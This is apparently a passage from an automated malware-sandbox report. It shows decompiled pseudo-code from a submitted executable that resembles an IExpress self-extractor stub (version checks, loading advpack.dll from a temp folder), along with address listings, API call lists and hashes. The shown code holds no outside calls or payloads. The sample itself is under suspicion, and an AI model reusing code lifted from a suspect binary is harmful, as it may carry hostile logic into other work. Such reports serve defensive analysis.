                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa48184 = _t135;
                                                                                                                                                                                                                                            							 *0xa48180 = _t135;
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                            						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t138 = 0x4ca;
                                                                                                                                                                                                                                            					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E00A444B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E00A46CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x00a436f9
                                                                                                                                                                                                                                            0x00a43700
                                                                                                                                                                                                                                            0x00a4370c
                                                                                                                                                                                                                                            0x00a43716
                                                                                                                                                                                                                                            0x00a43718
                                                                                                                                                                                                                                            0x00a4371b
                                                                                                                                                                                                                                            0x00a43721
                                                                                                                                                                                                                                            0x00a4372b
                                                                                                                                                                                                                                            0x00a4373d
                                                                                                                                                                                                                                            0x00a43745
                                                                                                                                                                                                                                            0x00a43746
                                                                                                                                                                                                                                            0x00a43746
                                                                                                                                                                                                                                            0x00a43749
                                                                                                                                                                                                                                            0x00a437ab
                                                                                                                                                                                                                                            0x00a437ad
                                                                                                                                                                                                                                            0x00a437ae
                                                                                                                                                                                                                                            0x00a437b3
                                                                                                                                                                                                                                            0x00a437b8
                                                                                                                                                                                                                                            0x00a437b8
                                                                                                                                                                                                                                            0x00a437bf
                                                                                                                                                                                                                                            0x00a437bf
                                                                                                                                                                                                                                            0x00a437c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a437cb
                                                                                                                                                                                                                                            0x00a437cd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a437d5
                                                                                                                                                                                                                                            0x00a437db
                                                                                                                                                                                                                                            0x00a437e8
                                                                                                                                                                                                                                            0x00a437ea
                                                                                                                                                                                                                                            0x00a437ea
                                                                                                                                                                                                                                            0x00a437ea
                                                                                                                                                                                                                                            0x00a437f0
                                                                                                                                                                                                                                            0x00a437f6
                                                                                                                                                                                                                                            0x00a43805
                                                                                                                                                                                                                                            0x00a43817
                                                                                                                                                                                                                                            0x00a4382b
                                                                                                                                                                                                                                            0x00a43830
                                                                                                                                                                                                                                            0x00a43836
                                                                                                                                                                                                                                            0x00a4383b
                                                                                                                                                                                                                                            0x00a4383d
                                                                                                                                                                                                                                            0x00a438eb
                                                                                                                                                                                                                                            0x00a438eb
                                                                                                                                                                                                                                            0x00a438f2
                                                                                                                                                                                                                                            0x00a4390c
                                                                                                                                                                                                                                            0x00a43911
                                                                                                                                                                                                                                            0x00a43911
                                                                                                                                                                                                                                            0x00a43913
                                                                                                                                                                                                                                            0x00a4394d
                                                                                                                                                                                                                                            0x00a4394d
                                                                                                                                                                                                                                            0x00a4394f
                                                                                                                                                                                                                                            0x00a438a9
                                                                                                                                                                                                                                            0x00a438a9
                                                                                                                                                                                                                                            0x00a438b0
                                                                                                                                                                                                                                            0x00a438b2
                                                                                                                                                                                                                                            0x00a438b9
                                                                                                                                                                                                                                            0x00a438bb
                                                                                                                                                                                                                                            0x00a438c1
                                                                                                                                                                                                                                            0x00a43975
                                                                                                                                                                                                                                            0x00a438c7
                                                                                                                                                                                                                                            0x00a438de
                                                                                                                                                                                                                                            0x00a438e0
                                                                                                                                                                                                                                            0x00a438e0
                                                                                                                                                                                                                                            0x00a4397b
                                                                                                                                                                                                                                            0x00a4397d
                                                                                                                                                                                                                                            0x00a439a9
                                                                                                                                                                                                                                            0x00a4397f
                                                                                                                                                                                                                                            0x00a43982
                                                                                                                                                                                                                                            0x00a4398b
                                                                                                                                                                                                                                            0x00a4398d
                                                                                                                                                                                                                                            0x00a4398f
                                                                                                                                                                                                                                            0x00a4399f
                                                                                                                                                                                                                                            0x00a439a1
                                                                                                                                                                                                                                            0x00a43991
                                                                                                                                                                                                                                            0x00a43991
                                                                                                                                                                                                                                            0x00a43991
                                                                                                                                                                                                                                            0x00a4398f
                                                                                                                                                                                                                                            0x00a439af
                                                                                                                                                                                                                                            0x00a439b6
                                                                                                                                                                                                                                            0x00a43a0f
                                                                                                                                                                                                                                            0x00a43a0f
                                                                                                                                                                                                                                            0x00a43a11
                                                                                                                                                                                                                                            0x00a43a13
                                                                                                                                                                                                                                            0x00a43a19
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a439b8
                                                                                                                                                                                                                                            0x00a439b8
                                                                                                                                                                                                                                            0x00a439ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a439bc
                                                                                                                                                                                                                                            0x00a439bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a439c3
                                                                                                                                                                                                                                            0x00a439c9
                                                                                                                                                                                                                                            0x00a439ce
                                                                                                                                                                                                                                            0x00a439d0
                                                                                                                                                                                                                                            0x00a439e3
                                                                                                                                                                                                                                            0x00a439e5
                                                                                                                                                                                                                                            0x00a439e6
                                                                                                                                                                                                                                            0x00a439f1
                                                                                                                                                                                                                                            0x00a439f7
                                                                                                                                                                                                                                            0x00a439fa
                                                                                                                                                                                                                                            0x00a43a01
                                                                                                                                                                                                                                            0x00a43a04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43a06
                                                                                                                                                                                                                                            0x00a43a09
                                                                                                                                                                                                                                            0x00a43a09
                                                                                                                                                                                                                                            0x00a43a0b
                                                                                                                                                                                                                                            0x00a43a0b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43a09
                                                                                                                                                                                                                                            0x00a439fc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a439fc
                                                                                                                                                                                                                                            0x00a439d3
                                                                                                                                                                                                                                            0x00a439d8
                                                                                                                                                                                                                                            0x00a439da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a439dc
                                                                                                                                                                                                                                            0x00a439b6
                                                                                                                                                                                                                                            0x00a43955
                                                                                                                                                                                                                                            0x00a4395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43961
                                                                                                                                                                                                                                            0x00a43963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43969
                                                                                                                                                                                                                                            0x00a43969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43969
                                                                                                                                                                                                                                            0x00a43915
                                                                                                                                                                                                                                            0x00a43915
                                                                                                                                                                                                                                            0x00a4391b
                                                                                                                                                                                                                                            0x00a4391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4392d
                                                                                                                                                                                                                                            0x00a43933
                                                                                                                                                                                                                                            0x00a43938
                                                                                                                                                                                                                                            0x00a4393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43940
                                                                                                                                                                                                                                            0x00a43946
                                                                                                                                                                                                                                            0x00a4394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a438f2
                                                                                                                                                                                                                                            0x00a43843
                                                                                                                                                                                                                                            0x00a43845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4384b
                                                                                                                                                                                                                                            0x00a4384d
                                                                                                                                                                                                                                            0x00a43883
                                                                                                                                                                                                                                            0x00a43885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4389a
                                                                                                                                                                                                                                            0x00a4389e
                                                                                                                                                                                                                                            0x00a4389e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a438a0
                                                                                                                                                                                                                                            0x00a438a0
                                                                                                                                                                                                                                            0x00a438a2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a438a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a438a4
                                                                                                                                                                                                                                            0x00a4384f
                                                                                                                                                                                                                                            0x00a43851
                                                                                                                                                                                                                                            0x00a43857
                                                                                                                                                                                                                                            0x00a4386e
                                                                                                                                                                                                                                            0x00a43877
                                                                                                                                                                                                                                            0x00a4387b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43881
                                                                                                                                                                                                                                            0x00a43859
                                                                                                                                                                                                                                            0x00a4385c
                                                                                                                                                                                                                                            0x00a43862
                                                                                                                                                                                                                                            0x00a43866
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43868
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a438f4
                                                                                                                                                                                                                                            0x00a438f4
                                                                                                                                                                                                                                            0x00a438f5
                                                                                                                                                                                                                                            0x00a438fb
                                                                                                                                                                                                                                            0x00a43901
                                                                                                                                                                                                                                            0x00a43901
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4390a
                                                                                                                                                                                                                                            0x00a4374b
                                                                                                                                                                                                                                            0x00a4374e
                                                                                                                                                                                                                                            0x00a4375c
                                                                                                                                                                                                                                            0x00a43764
                                                                                                                                                                                                                                            0x00a43769
                                                                                                                                                                                                                                            0x00a4376e
                                                                                                                                                                                                                                            0x00a43771
                                                                                                                                                                                                                                            0x00a4379c
                                                                                                                                                                                                                                            0x00a4379f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a437a3
                                                                                                                                                                                                                                            0x00a437a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a437a4
                                                                                                                                                                                                                                            0x00a43773
                                                                                                                                                                                                                                            0x00a43777
                                                                                                                                                                                                                                            0x00a43778
                                                                                                                                                                                                                                            0x00a4377f
                                                                                                                                                                                                                                            0x00a43781
                                                                                                                                                                                                                                            0x00a4378e
                                                                                                                                                                                                                                            0x00a4378e
                                                                                                                                                                                                                                            0x00a43794
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43794
                                                                                                                                                                                                                                            0x00a43783
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43785
                                                                                                                                                                                                                                            0x00a4378c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4378c
                                                                                                                                                                                                                                            0x00a43750
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4372d
                                                                                                                                                                                                                                            0x00a4372d
                                                                                                                                                                                                                                            0x00a4396b
                                                                                                                                                                                                                                            0x00a4396b
                                                                                                                                                                                                                                            0x00a4396c
                                                                                                                                                                                                                                            0x00a4396e
                                                                                                                                                                                                                                            0x00a4396f
                                                                                                                                                                                                                                            0x00a43a1e
                                                                                                                                                                                                                                            0x00a43a1e
                                                                                                                                                                                                                                            0x00a43a22
                                                                                                                                                                                                                                            0x00a43a27
                                                                                                                                                                                                                                            0x00a43a3e
                                                                                                                                                                                                                                            0x00a43a3e

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A43723
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A439C3
                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 00A439F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                            • String ID: 3$cent
                                                                                                                                                                                                                                            • API String ID: 2519184315-3438608206
                                                                                                                                                                                                                                            • Opcode ID: 4be5c62929c2f1e5d856264f1c20873aa0709f2815826653eaec19d5dfe7ce96
                                                                                                                                                                                                                                            • Instruction ID: 9205155e32bfee66196b28a7c5cb752836d26f73423012aff7b95ad3f0fa9e10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be5c62929c2f1e5d856264f1c20873aa0709f2815826653eaec19d5dfe7ce96
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0091137AA012249FEF74CF69CD917AAB3B0ABC5344F1541A9D889DB242DB718F81CF01
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                            			E00A46495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed char _t14;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                                                                            				_t18 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				E00A41781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            				_t26 = "advpack.dll";
                                                                                                                                                                                                                                            				E00A4658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                            				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x00a46495
                                                                                                                                                                                                                                            0x00a46495
                                                                                                                                                                                                                                            0x00a464a0
                                                                                                                                                                                                                                            0x00a464a7
                                                                                                                                                                                                                                            0x00a464ab
                                                                                                                                                                                                                                            0x00a464bd
                                                                                                                                                                                                                                            0x00a464c2
                                                                                                                                                                                                                                            0x00a464d3
                                                                                                                                                                                                                                            0x00a464df
                                                                                                                                                                                                                                            0x00a464e8
                                                                                                                                                                                                                                            0x00a46502
                                                                                                                                                                                                                                            0x00a464ee
                                                                                                                                                                                                                                            0x00a464f9
                                                                                                                                                                                                                                            0x00a464f9
                                                                                                                                                                                                                                            0x00a46516

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A464DF
                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A464F9
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A46502
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                            • API String ID: 438848745-258089097
                                                                                                                                                                                                                                            • Opcode ID: 44b9c22f5f04566ab44ebbd90143b4d2ab27454c36252ea41dc1cda06701b6ca
                                                                                                                                                                                                                                            • Instruction ID: f752aedc86dc90cb04dd118e3990fd64e56b52e67df76214db4974deb5066de1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44b9c22f5f04566ab44ebbd90143b4d2ab27454c36252ea41dc1cda06701b6ca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C01F93C540108ABDB50EBA4DC45EEE7378EBE2311F500295F585921C0DF709EC6CA53
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A428E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E00A42773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L19;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t79 = _v44;
                                                                                                                                                                                                                                            										_t88 = _t106;
                                                                                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                            										_t101 = _v28;
                                                                                                                                                                                                                                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                            										_t97 = _v48;
                                                                                                                                                                                                                                            										_v36 = _t83;
                                                                                                                                                                                                                                            										_t109 = _t83;
                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A42A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A42A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                            											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                            											_t88 = _t88 + 4;
                                                                                                                                                                                                                                            										} while (_t88 < 8);
                                                                                                                                                                                                                                            										_t87 = _v20;
                                                                                                                                                                                                                                            										_t106 = 0;
                                                                                                                                                                                                                                            										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                            											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                            												GlobalUnlock(_t103);
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												goto L15;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L15;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                            				 *_a8 = _t87;
                                                                                                                                                                                                                                            				if(_t103 != 0) {
                                                                                                                                                                                                                                            					GlobalFree(_t103);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t106;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x00a428f1
                                                                                                                                                                                                                                            0x00a428f4
                                                                                                                                                                                                                                            0x00a428f7
                                                                                                                                                                                                                                            0x00a428f9
                                                                                                                                                                                                                                            0x00a428fc
                                                                                                                                                                                                                                            0x00a428ff
                                                                                                                                                                                                                                            0x00a42901
                                                                                                                                                                                                                                            0x00a42907
                                                                                                                                                                                                                                            0x00a42a62
                                                                                                                                                                                                                                            0x00a42a64
                                                                                                                                                                                                                                            0x00a4290d
                                                                                                                                                                                                                                            0x00a4290d
                                                                                                                                                                                                                                            0x00a4290f
                                                                                                                                                                                                                                            0x00a42912
                                                                                                                                                                                                                                            0x00a42920
                                                                                                                                                                                                                                            0x00a42937
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42944
                                                                                                                                                                                                                                            0x00a4294a
                                                                                                                                                                                                                                            0x00a4294f
                                                                                                                                                                                                                                            0x00a42a2f
                                                                                                                                                                                                                                            0x00a42a32
                                                                                                                                                                                                                                            0x00a42a34
                                                                                                                                                                                                                                            0x00a42a37
                                                                                                                                                                                                                                            0x00a42a41
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42955
                                                                                                                                                                                                                                            0x00a4295e
                                                                                                                                                                                                                                            0x00a42962
                                                                                                                                                                                                                                            0x00a42969
                                                                                                                                                                                                                                            0x00a4296f
                                                                                                                                                                                                                                            0x00a42974
                                                                                                                                                                                                                                            0x00a4298c
                                                                                                                                                                                                                                            0x00a42a20
                                                                                                                                                                                                                                            0x00a42a21
                                                                                                                                                                                                                                            0x00a42a27
                                                                                                                                                                                                                                            0x00a42a4c
                                                                                                                                                                                                                                            0x00a42a4f
                                                                                                                                                                                                                                            0x00a42a50
                                                                                                                                                                                                                                            0x00a42a53
                                                                                                                                                                                                                                            0x00a42a56
                                                                                                                                                                                                                                            0x00a42a5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a429b2
                                                                                                                                                                                                                                            0x00a429b2
                                                                                                                                                                                                                                            0x00a429b5
                                                                                                                                                                                                                                            0x00a429bd
                                                                                                                                                                                                                                            0x00a429c3
                                                                                                                                                                                                                                            0x00a429cc
                                                                                                                                                                                                                                            0x00a429d5
                                                                                                                                                                                                                                            0x00a429d7
                                                                                                                                                                                                                                            0x00a429da
                                                                                                                                                                                                                                            0x00a429dd
                                                                                                                                                                                                                                            0x00a429df
                                                                                                                                                                                                                                            0x00a429ec
                                                                                                                                                                                                                                            0x00a429f8
